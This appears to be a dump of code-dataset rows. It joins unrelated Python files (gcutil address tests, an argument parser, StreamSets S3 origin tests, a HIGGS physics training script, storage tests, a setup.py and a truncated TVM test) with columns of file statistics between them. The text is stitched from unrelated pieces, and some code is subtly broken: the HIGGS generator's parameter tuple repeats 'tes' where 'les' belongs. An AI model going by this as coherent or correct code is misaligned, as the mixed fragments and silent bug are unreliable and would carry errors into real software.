request = call.GetRequest()
self.assertEqual('GET', request.method)
self.assertEqual(None, request.body)
parameters = request.parameters
self.assertEqual(parameters['project'], expected_project)
self.assertEqual(parameters['region'], submitted_region)
self.assertEqual(parameters['address'], expected_address)
def testGetAddressPrintNonEmptyUsers(self):
expected_project = 'test_project'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.GetAddress, 'getaddress', set_flags=set_flags)
data = command.GetDetailRow({'users': ['fr-1', 'fr-2']})
expected_data = {
'v1': [
('users', ['fr-1', 'fr-2'])
],
}
self.assertEquals(
gcutil_unittest.SelectTemplateForVersion(
expected_data, command.api.version),
data)
def testGetAddressPrintEmptyUsers(self):
expected_project = 'test_project'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.GetAddress, 'getaddress', set_flags=set_flags)
data = command.GetDetailRow({'users': []})
expected_data = {
'v1': [
('users', [])
],
}
self.assertEquals(
gcutil_unittest.SelectTemplateForVersion(
expected_data, command.api.version),
data)
def testReleaseAddressGeneratesCorrectRequest(self):
expected_project = 'test_project'
expected_address = 'test_address'
submitted_region = 'test-region'
set_flags = {
'project': expected_project,
'region': submitted_region,
}
command = self._CreateAndInitializeCommand(
address_cmds.ReleaseAddress, 'releaseaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.delete', {})
command.Handle(expected_address)
request = call.GetRequest()
self.assertEqual('DELETE', request.method)
self.assertEqual(None, request.body)
parameters = request.parameters
self.assertEqual(parameters['project'], expected_project)
self.assertEqual(parameters['region'], submitted_region)
self.assertEqual(parameters['address'], expected_address)
def testReleaseAddressWithoutRegionFlag(self):
expected_project = 'test_project'
expected_region = 'test-region'
expected_address = 'test_address'
address = ('projects/%s/regions/%s/addresses/%s' %
(expected_project, expected_region, expected_address))
set_flags = {
'project': 'incorrect_project',
}
command = self._CreateAndInitializeCommand(
address_cmds.ReleaseAddress, 'releaseaddress', set_flags=set_flags)
call = self.mock.Respond('compute.addresses.delete', {})
command.Handle(address)
request = call.GetRequest()
self.assertEqual('DELETE', request.method)
self.assertEqual(None, request.body)
parameters = request.parameters
self.assertEqual(parameters['project'], expected_project)
self.assertEqual(parameters['region'], expected_region)
self.assertEqual(parameters['address'], expected_address)
def testReleaseMultipleAddresses(self):
expected_project = 'test_project'
expected_addresses = [
'test-addresses-%02d' % x for x in xrange(100)]
set_flags = {
'project': expected_project,
'region': 'region-a',
}
command = self._CreateAndInitializeCommand(
address_cmds.ReleaseAddress, 'releaseaddress', set_flags=set_flags)
calls = [self.mock.Respond('compute.addresses.delete', {})
for x in xrange(len(expected_addresses))]
_, exceptions = command.Handle(*expected_addresses)
self.assertEqual(0, len(exceptions))
sorted_calls = sorted([call.GetRequest().parameters['address'] for
call in calls])
self.assertEqual(expected_addresses, sorted_calls)
if __name__ == '__main__':
unittest.main(testLoader=gcutil_unittest.GcutilLoader())
| 32.362903 | 75 | 0.705457 | 825 | 8,026 | 6.66303 | 0.193939 | 0.068219 | 0.040022 | 0.033473 | 0.698563 | 0.681281 | 0.652538 | 0.652538 | 0.64235 | 0.629252 | 0 | 0.006286 | 0.187391 | 8,026 | 247 | 76 | 32.493927 | 0.836553 | 0.076501 | 0 | 0.672316 | 0 | 0 | 0.128888 | 0.023803 | 0 | 0 | 0 | 0 | 0.175141 | 1 | 0.050847 | false | 0 | 0.045198 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cfa416e684eef42a41f05552ac51704b017a9e1
| 1,471 |
py
|
Python
|
arguments_setting.py
|
Projectoy/ml_framework
|
f3d37d632a1aec314eb186a3da6d174a5dc4beee
|
[
"Apache-2.0"
] | null | null | null |
arguments_setting.py
|
Projectoy/ml_framework
|
f3d37d632a1aec314eb186a3da6d174a5dc4beee
|
[
"Apache-2.0"
] | null | null | null |
arguments_setting.py
|
Projectoy/ml_framework
|
f3d37d632a1aec314eb186a3da6d174a5dc4beee
|
[
"Apache-2.0"
] | null | null | null |
import argparse, os
class ArgumentManager:
def __init__(self, model_list):
self.model_list = model_list
self.args = self.get_input_arguments()
self.validate_arguments()
def get_input_arguments(self):
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument("--configuration", "-c", required=True, help="the path of a configuration file(json type)")
parser.add_argument("--model", "-m", required=True, help="the model to process")
parser.add_argument("--task", "-t", required=True, help="training/testing")
return parser.parse_args()
def validate_arguments(self):
self.validate_configuration_path()
self.validate_model()
self.validate_task()
def validate_task(self):
task = self.args.task
assert task == "training" or task == "testing", "task should be training or testing"
def validate_model(self):
model = self.args.model
assert model in self.model_list, "model is not in the prepared model list"
def validate_configuration_path(self):
config_path = self.args.configuration
assert os.path.exists(config_path), "configuration path is inappropriate (not found file)"
def get_configuraiton_file_path(self):
return self.args.configuration
def get_model_type(self):
return self.args.model
def get_task_type(self):
return self.args.task
| 36.775 | 119 | 0.680489 | 185 | 1,471 | 5.221622 | 0.302703 | 0.057971 | 0.040373 | 0.055901 | 0.045549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2155 | 1,471 | 40 | 120 | 36.775 | 0.837088 | 0 | 0 | 0 | 0 | 0 | 0.186821 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 1 | 0.290323 | false | 0 | 0.032258 | 0.096774 | 0.483871 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cfaab0b77af0b6c7c138ff09a0a82244c391f57
| 12,133 |
py
|
Python
|
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | 1 |
2019-10-29T08:46:11.000Z
|
2019-10-29T08:46:11.000Z
|
import logging
import pytest
from streamsets.testframework.markers import aws, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)
S3_SANDBOX_PREFIX = 'sandbox'
LOG_FIELD_MAPPING = [{'fieldPath': '/date', 'group': 1},
{'fieldPath': '/time', 'group': 2},
{'fieldPath': '/timehalf', 'group': 3},
{'fieldPath': '/info', 'group': 4},
{'fieldPath': '/file', 'group': 5},
{'fieldPath': '/message', 'group': 6}]
REGULAR_EXPRESSION = r'(\S+) (\S+) (\S+) (\S+) (\S+) (.*)'
# log to be written int the file on s3
data_format_content = {
'COMMON_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] '
'"GET /apache.gif HTTP/1.0" 200 232',
'LOG4J': '200 [main] DEBUG org.StreamSets.Log4j unknown - This is sample log message',
'APACHE_ERROR_LOG_FORMAT': '[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client '
'denied by server configuration:/export/home/live/ap/htdocs/test',
'COMBINED_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache.gif'
' HTTP/1.0" 200 2326 "http://www.example.com/strt.html" "Mozilla/4.08'
' [en] (Win98; I ;Nav)"',
'APACHE_CUSTOM_LOG_FORMAT': '10.185.248.71 - - [09/Jan/2015:9:12:06 +0000] "GET '
'/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 '
'HTTP/1.1" 500 17 ',
'CEF': '10.217.31.247 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=10.217.253.78 '
'spt=53743 method=GET request=http://vpx247.example.net/FFC/login.html msg=Disallow Illegal URL.',
'LEEF': 'LEEF: 2.0|Trend Micro|Deep Security Agent|<DSA version>|4000030|cat=Anti-Malware '
'name=HEU_AEGIS_CRYPT desc=HEU_AEGIS_CRYPT sev=6 cn1=241 msg=Realtime',
'REGEX': '2019-04-30 08:23:53 AM [INFO] [streamsets.sdk.sdc_api] Pipeline Filewriterpipeline53'}
# data to verify the output of amazon s3 origin.
get_data_to_verify_output = {
'LOG4J': {'severity': 'DEBUG', 'relativetime': '200', 'thread': 'main', 'category': 'org.StreamSets.Log4j',
'ndc': 'unknown', 'message': 'This is sample log message'},
'COMMON_LOG_FORMAT': {'request': '/apache.gif', 'auth': 'frank', 'ident': '-', 'response': '200', 'bytes':
'232', 'clientip': '127.0.0.1', 'verb': 'GET', 'httpversion': '1.0', 'rawrequest': None,
'timestamp': '10/Oct/2000:13:55:36 -0700'},
'APACHE_ERROR_LOG_FORMAT': {'message': 'client denied by server configuration:/export/home/live/ap/htdocs/'
'test', 'timestamp': 'Wed Oct 11 14:32:52 2000', 'loglevel': 'error',
'clientip': '127.0.0.1'},
'COMBINED_LOG_FORMAT': {'request': '/apache.gif', 'agent': '"Mozilla/4.08 [en] (Win98; I ;Nav)"', 'auth':
'frank', 'ident': '-', 'verb': 'GET', 'referrer': '"http://www.example.com/strt.'
'html"', 'response': '200', 'bytes': '2326', 'clientip': '127.0.0.1',
'httpversion': '1.0', 'rawrequest': None, 'timestamp': '10/Oct/2000:13:55:36 -0700'},
'APACHE_CUSTOM_LOG_FORMAT': {'remoteUser': '-', 'requestTime': '09/Jan/2015:9:12:06 +0000', 'request': 'GET '
'/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 HTTP/1.1',
'logName': '-', 'remoteHost': '10.185.248.71', 'bytesSent': '17', 'status': '500'},
'CEF': {'severity': '6', 'product': 'NetScaler', 'extensions': {'msg': 'Disallow Illegal URL.', 'request':
'http://vpx247.example.net/FFC/login.html', 'method': 'GET', 'src': '10.217.253.78', 'spt': '53743'},
'signature': 'APPFW', 'vendor': 'Citrix', 'cefVersion': 0, 'name': 'APPFW_STARTURL',
'version': 'NS10.0'},
'GROK': {'request': '/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300', 'auth': '-',
'ident': '-', 'response': '500', 'bytes': '17', 'clientip': '10.185.248.71', 'verb': 'GET',
'httpversion': '1.1', 'rawrequest': None, 'timestamp': '09/Jan/2015:9:12:06 +0000'},
'LEEF': {'eventId': '4000030', 'product': 'Deep Security Agent', 'extensions': {'cat': 'Realtime'},
'leefVersion': 2.0, 'vendor': 'Trend Micro', 'version': '<DSA version>'},
'REGEX': {'/time': '08:23:53', '/date': '2019-04-30', '/timehalf': 'AM',
'/info': '[INFO]', '/message': 'Pipeline Filewriterpipeline53', '/file': '[streamsets.sdk.sdc_api]'}}
@pytest.mark.skip('Not yet implemented')
def test_configuration_access_key_id(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_bucket(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_connection_timeout(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('task', ['CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_content(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.parametrize('delete_original_object', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_delete_original_object(sdc_builder, sdc_executor, task, delete_original_object):
pass
@pytest.mark.parametrize('region', ['OTHER'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_endpoint(sdc_builder, sdc_executor, region):
pass
@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_new_object_path(sdc_builder, sdc_executor, task):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_object(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('on_record_error', ['DISCARD', 'STOP_PIPELINE', 'TO_ERROR'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_on_record_error(sdc_builder, sdc_executor, on_record_error):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_preconditions(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_host(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_password(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_port(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_user(sdc_builder, sdc_executor, use_proxy):
pass
@pytest.mark.parametrize('region', ['AP_NORTHEAST_1', 'AP_NORTHEAST_2', 'AP_NORTHEAST_3', 'AP_SOUTHEAST_1', 'AP_SOUTHEAST_2', 'AP_SOUTH_1', 'CA_CENTRAL_1', 'CN_NORTHWEST_1', 'CN_NORTH_1', 'EU_CENTRAL_1', 'EU_WEST_1', 'EU_WEST_2', 'EU_WEST_3', 'OTHER', 'SA_EAST_1', 'US_EAST_1', 'US_EAST_2', 'US_GOV_WEST_1', 'US_WEST_1', 'US_WEST_2'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_region(sdc_builder, sdc_executor, region):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_required_fields(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_retry_count(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_secret_access_key(sdc_builder, sdc_executor):
pass
@pytest.mark.skip('Not yet implemented')
def test_configuration_socket_timeout(sdc_builder, sdc_executor):
pass
@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_tags(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT', 'COPY_OBJECT', 'CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_task(sdc_builder, sdc_executor, task):
pass
@pytest.mark.parametrize('use_proxy', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_use_proxy(sdc_builder, sdc_executor, use_proxy):
pass
@aws('s3')
@pytest.mark.parametrize('data_format', ['LOG'])
@pytest.mark.parametrize('log_format', ['COMMON_LOG_FORMAT', 'APACHE_ERROR_LOG_FORMAT', 'COMBINED_LOG_FORMAT',
'APACHE_CUSTOM_LOG_FORMAT', 'REGEX', 'GROK', 'LOG4J', 'CEF', 'LEEF'])
def test_configurations_data_format_log(sdc_executor, sdc_builder, aws, data_format, log_format):
"""Check whether S3 origin can parse different log format or not. A log file is being created in s3 bucket
mentioned below .S3 origin reads the log file and parse the same.
Pipeline for the same-
s3_origin >> trash
s3_origin >= pipeline_finisher_executor
"""
if log_format == 'GROK':
file_content = data_format_content['APACHE_CUSTOM_LOG_FORMAT']
else:
file_content = data_format_content[log_format]
client = aws.s3
s3_key = f'{S3_SANDBOX_PREFIX}/{get_random_string()}'
attributes = {'bucket': aws.s3_bucket_name,
'prefix_pattern': f'{s3_key}/*',
'number_of_threads': 1,
'read_order': 'LEXICOGRAPHICAL',
'data_format': data_format,
'log_format': log_format,
'custom_log_format': '%h %l %u [%t] "%r" %>s %b',
'regular_expression': REGULAR_EXPRESSION,
'field_path_to_regex_group_mapping': LOG_FIELD_MAPPING
}
pipeline = get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws)
s3_origin = pipeline.origin_stage
try:
client.put_object(Bucket=aws.s3_bucket_name, Key=f'{s3_key}/{get_random_string()}.log', Body=file_content)
output_records = execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline)
assert output_records[0].field == get_data_to_verify_output[log_format]
finally:
if sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING':
sdc_executor.stop_pipeline(pipeline)
# cleaning up s3 bucket
delete_aws_objects(client, aws, s3_key)
def get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws):
# Build pipeline.
builder = sdc_builder.get_pipeline_builder()
builder.add_error_stage('Discard')
s3_origin = builder.add_stage('Amazon S3', type='origin')
s3_origin.set_attributes(**attributes)
trash = builder.add_stage('Trash')
pipeline_finisher_executor = builder.add_stage('Pipeline Finisher Executor')
pipeline_finisher_executor.set_attributes(stage_record_preconditions=["${record:eventType() == 'no-more-data'}"])
s3_origin >> trash
s3_origin >= pipeline_finisher_executor
s3_origin_pipeline = builder.build().configure_for_environment(aws)
s3_origin_pipeline.configuration['shouldRetry'] = False
return s3_origin_pipeline
def delete_aws_objects(client, aws, s3_key):
# Clean up S3.
delete_keys = {'Objects': [{'Key': k['Key']}
for k in
client.list_objects_v2(Bucket=aws.s3_bucket_name, Prefix=s3_key)['Contents']]}
client.delete_objects(Bucket=aws.s3_bucket_name, Delete=delete_keys)
def execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline):
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
output_records = snapshot[s3_origin].output
return output_records
| 46.84556 | 334 | 0.656556 | 1,539 | 12,133 | 4.925926 | 0.223522 | 0.050125 | 0.040628 | 0.049334 | 0.502308 | 0.45614 | 0.441367 | 0.397705 | 0.351801 | 0.311305 | 0 | 0.050808 | 0.193769 | 12,133 | 258 | 335 | 47.027132 | 0.724187 | 0.031979 | 0 | 0.26178 | 0 | 0.04712 | 0.359911 | 0.071111 | 0 | 0 | 0 | 0 | 0.005236 | 1 | 0.136126 | false | 0.120419 | 0.020942 | 0 | 0.167539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cfcc11fbbb1d31705e442bed5fe7d622b04a2bd
| 4,472 |
py
|
Python
|
benchmark/AMS/HIGGSTES/TP.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | 2 |
2019-03-20T09:05:02.000Z
|
2019-03-20T15:23:44.000Z
|
benchmark/AMS/HIGGSTES/TP.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | null | null | null |
benchmark/AMS/HIGGSTES/TP.py
|
victor-estrade/SystGradDescent
|
822e7094290301ec47a99433381a8d6406798aff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
# Command line :
# python -m benchmark.VAR.GG.TP
import os
import logging
from config import SEED
from config import _ERROR
from config import _TRUTH
import numpy as np
import pandas as pd
from visual.misc import set_plot_config
set_plot_config()
from utils.log import set_logger
from utils.log import flush
from utils.log import print_line
from utils.model import get_model
from utils.model import get_optimizer
from utils.model import train_or_load_neural_net
from utils.evaluation import evaluate_summary_computer
from utils.images import gather_images
from visual.misc import plot_params
from problem.higgs import HiggsConfigTesOnly as Config
from problem.higgs import get_generators_torch
from problem.higgs import GeneratorCPU
from problem.higgs import GeneratorTorch
from problem.higgs import HiggsNLL as NLLComputer
from model.tangent_prop import TangentPropClassifier
from archi.classic import L4 as ARCHI
from ...my_argparser import TP_parse_args
from collections import OrderedDict
from .common import measurement
DATA_NAME = 'HIGGSTES'
BENCHMARK_NAME = 'VAR-'+DATA_NAME
N_ITER = 30
class TrainGenerator:
def __init__(self, data_generator, cuda=False):
self.data_generator = data_generator
if cuda:
self.data_generator.cuda()
else:
self.data_generator.cpu()
self.mu = self.tensor(Config.CALIBRATED.mu, requires_grad=True)
self.tes = self.tensor(Config.CALIBRATED.tes, requires_grad=True)
self.jes = self.tensor(Config.CALIBRATED.jes, requires_grad=True)
self.les = self.tensor(Config.CALIBRATED.les, requires_grad=True)
self.params = (self.tes, self.jes, self.tes, self.mu)
self.nuisance_params = OrderedDict([
('tes', self.tes),
('jes', self.jes),
('les', self.les),
])
def generate(self, n_samples=None):
X, y, w = self.data_generator.diff_generate(*self.params, n_samples=n_samples)
return X, y, w
def reset(self):
self.data_generator.reset()
def tensor(self, data, requires_grad=False, dtype=None):
return self.data_generator.tensor(data, requires_grad=requires_grad, dtype=dtype)
def build_model(args, i_cv):
args.net = ARCHI(n_in=29, n_out=2, n_unit=args.n_unit)
args.optimizer = get_optimizer(args)
model = get_model(args, TangentPropClassifier)
model.set_info(DATA_NAME, BENCHMARK_NAME, i_cv)
return model
# =====================================================================
# MAIN
# =====================================================================
def main():
# BASIC SETUP
logger = set_logger()
args = TP_parse_args(main_description="Training launcher for INFERNO on GG benchmark")
logger.info(args)
flush(logger)
# INFO
model = build_model(args, -1)
os.makedirs(model.results_directory, exist_ok=True)
# RUN
logger.info(f'Running runs [{args.start_cv},{args.end_cv}[')
results = [run(args, i_cv) for i_cv in range(args.start_cv, args.end_cv)]
results = pd.concat(results, ignore_index=True)
# EVALUATION
results.to_csv(os.path.join(model.results_directory, 'threshold.csv'))
print(results)
print("DONE !")
def run(args, i_cv):
logger = logging.getLogger()
print_line()
logger.info('Running iter n°{}'.format(i_cv))
print_line()
# LOAD/GENERATE DATA
logger.info('Set up data generator')
config = Config()
seed = SEED + i_cv * 5
train_generator, valid_generator, test_generator = get_generators_torch(seed, cuda=args.cuda)
train_generator = TrainGenerator(train_generator, cuda=args.cuda)
valid_generator = GeneratorCPU(valid_generator)
test_generator = GeneratorCPU(test_generator)
# SET MODEL
logger.info('Set up classifier')
model = build_model(args, i_cv)
os.makedirs(model.results_path, exist_ok=True)
flush(logger)
# TRAINING / LOADING
train_or_load_neural_net(model, train_generator, retrain=args.retrain)
# MEASUREMENT
results = measurement(model, i_cv, config, valid_generator, test_generator)
print(results)
return results
if __name__ == '__main__':
main()
| 30.841379 | 97 | 0.687165 | 590 | 4,472 | 4.981356 | 0.283051 | 0.039809 | 0.04049 | 0.037428 | 0.059204 | 0.018374 | 0.018374 | 0 | 0 | 0 | 0 | 0.002498 | 0.19432 | 4,472 | 144 | 98 | 31.055556 | 0.812934 | 0.070662 | 0 | 0.06 | 0 | 0 | 0.046366 | 0.007486 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07 | false | 0 | 0.31 | 0.01 | 0.43 | 0.07 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
6b00216e5015b612b495eca186f46004bdc92b04
| 1,824 |
py
|
Python
|
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.4
__author__ = "Jeremy Rabasco"
import sys
import os
sys.path.append("..")
import unittest
from modules import storage
from modules.service import Service
from modules.database import Database
class TestStorage(unittest.TestCase):
def setUp(self):
self.service = Service()
self.database = Database()
open("test.service", "w+").close()
open("test.db", "w+").close()
def test_write_read_service(self):
self.service.service_name = "Hello"
self.service.username = "This"
self.service.password = "Works"
storage.write("test", self.service, "test.service")
service2 = Service()
storage.read("test", service2, "test.service")
self.assertEqual(service2.service_name, self.service.service_name)
self.assertEqual(service2.username, self.service.username)
self.assertEqual(service2.password, self.service.password)
def test_write_read_database(self):
self.database.add_service(Service())
self.database.add_service(Service())
self.database.name = "Hey"
storage.write("test", self.database, "test.db")
database2 = Database()
storage.read("test", database2, "test.db")
self.assertEqual(database2.name, self.database.name)
for i in range(len(self.database.services)):
self.assertEqual(database2.services[i].service_name, self.database.services[i].service_name)
self.assertEqual(database2.services[i].username, self.database.services[i].username)
self.assertEqual(database2.services[i].password, self.database.services[i].password)
def tearDown(self):
os.remove(os.getcwd() + "/test.service")
os.remove(os.getcwd() + "/test.db")
if __name__ == "__main__":
unittest.main()
| 35.076923 | 104 | 0.668311 | 215 | 1,824 | 5.553488 | 0.246512 | 0.100503 | 0.050251 | 0.065327 | 0.204355 | 0.058626 | 0.058626 | 0 | 0 | 0 | 0 | 0.008844 | 0.194079 | 1,824 | 52 | 105 | 35.076923 | 0.803401 | 0.010417 | 0 | 0.04878 | 0 | 0 | 0.077008 | 0 | 0 | 0 | 0 | 0 | 0.170732 | 1 | 0.097561 | false | 0.073171 | 0.146341 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6b01058178b8f414abe46085a609e4696e9cb097
| 1,096 |
py
|
Python
|
setup.py
|
ripiuk/fant_sizer
|
dcc0908c79ed76af3f4189ebd2a75cecf7a89e34
|
[
"MIT"
] | null | null | null |
setup.py
|
ripiuk/fant_sizer
|
dcc0908c79ed76af3f4189ebd2a75cecf7a89e34
|
[
"MIT"
] | null | null | null |
setup.py
|
ripiuk/fant_sizer
|
dcc0908c79ed76af3f4189ebd2a75cecf7a89e34
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
from os.path import join, dirname
setup(
name="fant_sizer",
version="0.7",
author="Rypiuk Oleksandr",
author_email="ripiuk96@gmail.com",
description="fant_sizer command-line file-information",
url="https://github.com/ripiuk/fant_sizer",
keywords="file command-line information size tool recursively",
license="MIT",
classifiers=[
'Topic :: Utilities',
'Environment :: Console',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python :: 3.6'
],
packages=find_packages(),
long_description=open(join(dirname(__file__), "README.rst")).read(),
entry_points={
"console_scripts":
['fant_sizer = fant_sizer.fant_sizer:_main'],
},
)
| 36.533333 | 76 | 0.581204 | 104 | 1,096 | 5.961538 | 0.673077 | 0.087097 | 0.041935 | 0.058065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009091 | 0.297445 | 1,096 | 29 | 77 | 37.793103 | 0.796104 | 0 | 0 | 0 | 0 | 0 | 0.457117 | 0.024635 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b04db30f6d56200725a9e9d3be9cbc67d645d65
| 2,074 |
py
|
Python
|
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 1 |
2020-07-29T00:21:19.000Z
|
2020-07-29T00:21:19.000Z
|
tests/python/unittest/test_tir_pass_inject_double_buffer.py
|
0xreza/tvm
|
f08d5d78ee000b2c113ac451f8d73817960eafd5
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 1 |
2021-07-22T17:33:16.000Z
|
2021-07-22T17:33:16.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
def test_double_buffer():
dtype = 'int64'
n = 100
m = 4
tx = te.thread_axis("threadIdx.x")
ib = tvm.tir.ir_builder.create()
A = ib.pointer("float32", name="A")
C = ib.pointer("float32", name="C")
ib.scope_attr(tx, "thread_extent", 1)
with ib.for_range(0, n) as i:
